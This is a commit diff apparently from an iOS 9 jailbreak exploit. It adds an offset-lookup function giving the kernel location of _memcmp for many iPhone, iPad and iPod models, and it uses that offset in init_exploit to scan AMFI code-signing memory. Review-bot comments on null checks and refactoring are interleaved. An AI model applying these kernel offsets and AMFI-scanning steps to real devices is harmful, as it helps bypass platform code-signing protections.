add find_memcmp() offset function

This commit is contained in:
Tim W 2018-10-21 21:17:00 +08:00
parent ccd56dd1b1
commit 853f9c3701
2 changed files with 141 additions and 3 deletions


@ -1263,9 +1263,7 @@ void init_exploit(void * dlsym_addr, void * dlopen_addr)
amfi_macho = (void*)((uint32_t)amfi_macho - 0x1000);
}
/*r2 -q kcache/kernelcache.bin -c "is" 2>&1 | grep _memcmp*/
/*3588 0x000c3c80 0x800c4c80 GLOBAL FUNC 0 _memcmp*/
uint32_t memcmp_what = kernel_start + 0xc3c81 + 1;
uint32_t memcmp_what = kernel_start + find_memcmp();
debug_print("memcmp_what %p\n", (void*)(memcmp_what));
uint32_t amfi_memcmp_off;
for (amfi_memcmp_off = amfi_macho_start; amfi_memcmp_off < kernel_size; amfi_memcmp_off += 4) {
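Review bot: The new `uint32_t memcmp_what = kernel_start + find_memcmp();` line uses the lookup result without checking it, and `find_memcmp()` returns 0 for any target not in its table, so on an unsupported device the scan that begins on the following `for` line searches for `kernel_start` itself rather than the address of `_memcmp`. Guard the result before it is folded into the address, e.g. `unsigned int memcmp_off = find_memcmp();` / `if (memcmp_off == 0) { debug_print("memcmp offset unknown for this target\n"); return; }` / `uint32_t memcmp_what = kernel_start + memcmp_off;` — init_exploit is declared `void` in the hunk header, so a bare `return` is valid there. Separately, the line being replaced computed `kernel_start + 0xc3c81 + 1` (i.e. offset 0xc3c82) while the new table yields 0xc3c80; if the loop below compares memory against that exact value (for instance a pointer with the low bit set), the two-byte difference should be confirmed as intentional rather than inherited from the symbol table. init_exploit continues outside the hunk on both sides.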


@ -2806,3 +2806,143 @@ static inline unsigned int find_mac_proc_check(void) {
}
}
/*r2 -q kcache/kernelcache.bin -c "is" | grep memcmp*/
/*3588 0x000c3c80 0x800c4c80 GLOBAL FUNC 0 _memcmp*/
static inline unsigned int find_memcmp(void) {
switch (target_environment) {
case iPhone41_iOS902: return 0xc3c80;
case iPhone41_iOS910: return 0xc3c80;
case iPhone41_iOS920: return 0xc3c80;
case iPhone41_iOS921: return 0xc3c80;
case iPhone41_iOS930: return 0xc3c80;
case iPhone41_iOS931: return 0xc3c80;
case iPhone41_iOS932: return 0xc3c80;
case iPhone41_iOS933: return 0xc3c80;
case iPhone41_iOS934: return 0xc3c80;
case iPhone51_iOS910: return 0xc3c80;
case iPhone51_iOS920: return 0xc3c80;
case iPhone51_iOS921: return 0xc3c80;
case iPhone51_iOS930: return 0xc3c80;
case iPhone51_iOS931: return 0xc3c80;
case iPhone51_iOS932: return 0xc3c80;
case iPhone51_iOS933: return 0xc3c80;
case iPhone51_iOS934: return 0xc3c80;
case iPhone52_iOS902: return 0xc3c80;
case iPhone52_iOS910: return 0xc3c80;
case iPhone52_iOS920: return 0xc3c80;
case iPhone52_iOS921: return 0xc3c80;
case iPhone52_iOS930: return 0xc3c80;
case iPhone52_iOS931: return 0xc3c80;
case iPhone52_iOS932: return 0xc3c80;
case iPhone52_iOS933: return 0xc3c80;
case iPhone52_iOS934: return 0xc3c80;
case iPhone53_iOS910: return 0xc3c80;
case iPhone53_iOS920: return 0xc3c80;
case iPhone53_iOS921: return 0xc3c80;
case iPhone53_iOS930: return 0xc3c80;
case iPhone53_iOS931: return 0xc3c80;
case iPhone53_iOS932: return 0xc3c80;
case iPhone53_iOS933: return 0xc3c80;
case iPhone53_iOS934: return 0xc3c80;
case iPhone54_iOS910: return 0xc3c80;
case iPhone54_iOS920: return 0xc3c80;
case iPhone54_iOS921: return 0xc3c80;
case iPhone54_iOS930: return 0xc3c80;
case iPhone54_iOS931: return 0xc3c80;
case iPhone54_iOS932: return 0xc3c80;
case iPhone54_iOS933: return 0xc3c80;
case iPhone54_iOS934: return 0xc3c80;
case iPad21_iOS910: return 0xc3c80;
case iPad21_iOS920: return 0xc3c80;
case iPad21_iOS921: return 0xc3c80;
case iPad21_iOS930: return 0xc3c80;
case iPad21_iOS931: return 0xc3c80;
case iPad21_iOS932: return 0xc3c80;
case iPad21_iOS933: return 0xc3c80;
case iPad21_iOS934: return 0xc3c80;
case iPad22_iOS910: return 0xc3c80;
case iPad22_iOS920: return 0xc3c80;
case iPad22_iOS921: return 0xc3c80;
case iPad22_iOS930: return 0xc3c80;
case iPad22_iOS931: return 0xc3c80;
case iPad22_iOS932: return 0xc3c80;
case iPad22_iOS933: return 0xc3c80;
case iPad22_iOS934: return 0xc3c80;
case iPad23_iOS910: return 0xc3c80;
case iPad23_iOS920: return 0xc3c80;
case iPad23_iOS921: return 0xc3c80;
case iPad23_iOS930: return 0xc3c80;
case iPad23_iOS931: return 0xc3c80;
case iPad23_iOS932: return 0xc3c80;
case iPad23_iOS933: return 0xc3c80;
case iPad23_iOS934: return 0xc3c80;
case iPad24_iOS910: return 0xc3c80;
case iPad24_iOS920: return 0xc3c80;
case iPad24_iOS921: return 0xc3c80;
case iPad24_iOS930: return 0xc3c80;
case iPad24_iOS931: return 0xc3c80;
case iPad24_iOS932: return 0xc3c80;
case iPad24_iOS933: return 0xc3c80;
case iPad24_iOS934: return 0xc3c80;
case iPad25_iOS902: return 0xc3c80;
case iPad31_iOS910: return 0xc3c80;
case iPad31_iOS920: return 0xc3c80;
case iPad31_iOS921: return 0xc3c80;
case iPad31_iOS930: return 0xc3c80;
case iPad31_iOS931: return 0xc3c80;
case iPad31_iOS932: return 0xc3c80;
case iPad31_iOS933: return 0xc3c80;
case iPad31_iOS934: return 0xc3c80;
case iPad32_iOS910: return 0xc3c80;
case iPad32_iOS920: return 0xc3c80;
case iPad32_iOS921: return 0xc3c80;
case iPad32_iOS930: return 0xc3c80;
case iPad32_iOS931: return 0xc3c80;
case iPad32_iOS932: return 0xc3c80;
case iPad32_iOS933: return 0xc3c80;
case iPad32_iOS934: return 0xc3c80;
case iPad33_iOS902: return 0xc3c80;
case iPad33_iOS910: return 0xc3c80;
case iPad33_iOS920: return 0xc3c80;
case iPad33_iOS921: return 0xc3c80;
case iPad33_iOS930: return 0xc3c80;
case iPad33_iOS931: return 0xc3c80;
case iPad33_iOS932: return 0xc3c80;
case iPad33_iOS933: return 0xc3c80;
case iPad33_iOS934: return 0xc3c80;
case iPad34_iOS910: return 0xc3c80;
case iPad34_iOS920: return 0xc3c80;
case iPad34_iOS921: return 0xc3c80;
case iPad34_iOS930: return 0xc3c80;
case iPad34_iOS931: return 0xc3c80;
case iPad34_iOS932: return 0xc3c80;
case iPad34_iOS933: return 0xc3c80;
case iPad34_iOS934: return 0xc3c80;
case iPad35_iOS910: return 0xc3c80;
case iPad35_iOS920: return 0xc3c80;
case iPad35_iOS921: return 0xc3c80;
case iPad35_iOS930: return 0xc3c80;
case iPad35_iOS931: return 0xc3c80;
case iPad35_iOS932: return 0xc3c80;
case iPad35_iOS933: return 0xc3c80;
case iPad35_iOS934: return 0xc3c80;
case iPad36_iOS910: return 0xc3c80;
case iPad36_iOS920: return 0xc3c80;
case iPad36_iOS921: return 0xc3c80;
case iPad36_iOS930: return 0xc3c80;
case iPad36_iOS931: return 0xc3c80;
case iPad36_iOS932: return 0xc3c80;
case iPad36_iOS933: return 0xc3c80;
case iPad36_iOS934: return 0xc3c80;
case iPod51_iOS910: return 0xc3c80;
case iPod51_iOS920: return 0xc3c80;
case iPod51_iOS921: return 0xc3c80;
case iPod51_iOS930: return 0xc3c80;
case iPod51_iOS931: return 0xc3c80;
case iPod51_iOS932: return 0xc3c80;
case iPod51_iOS933: return 0xc3c80;
case iPod51_iOS934: return 0xc3c80;
default: return 0;
}
}
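Review bot: All 132 case labels in find_memcmp return the same literal `0xc3c80`, so the per-target switch conveys no information and every future target becomes another near-identical line that can silently drift from the rest. Collapse the labels into a single fallthrough run with one `return 0xc3c80;`, and add a header comment stating the contract: the value is the kernel-base-relative offset of the `_memcmp` symbol (as the `r2` comment above the function records) and `0` means the target is absent from the table, which callers must treat as "not found" because `kernel_start + 0` is a plausible-looking but wrong address. The `static inline` on a function this long is a minor style point as well; the compiler decides inlining regardless, and plain `static` reads more honestly for a table lookup. The surrounding sibling lookups (e.g. find_mac_proc_check just above) presumably follow the same one-label-per-line pattern, so whichever shape is chosen should be applied consistently.

```c
/*
 * Offset of the kernel's _memcmp symbol relative to the kernel base.
 * The offset is identical for every supported target listed below.
 * Returns 0 when target_environment is not in the table; callers must
 * check for 0 before adding the result to kernel_start.
 */
static unsigned int find_memcmp(void) {
    switch (target_environment) {
        case iPhone41_iOS902:
        case iPhone41_iOS910:
        /* … remaining iPhone/iPad/iPod target labels, one per line, unchanged … */
        case iPod51_iOS934:
            return 0xc3c80;
        default:
            return 0;
    }
}
```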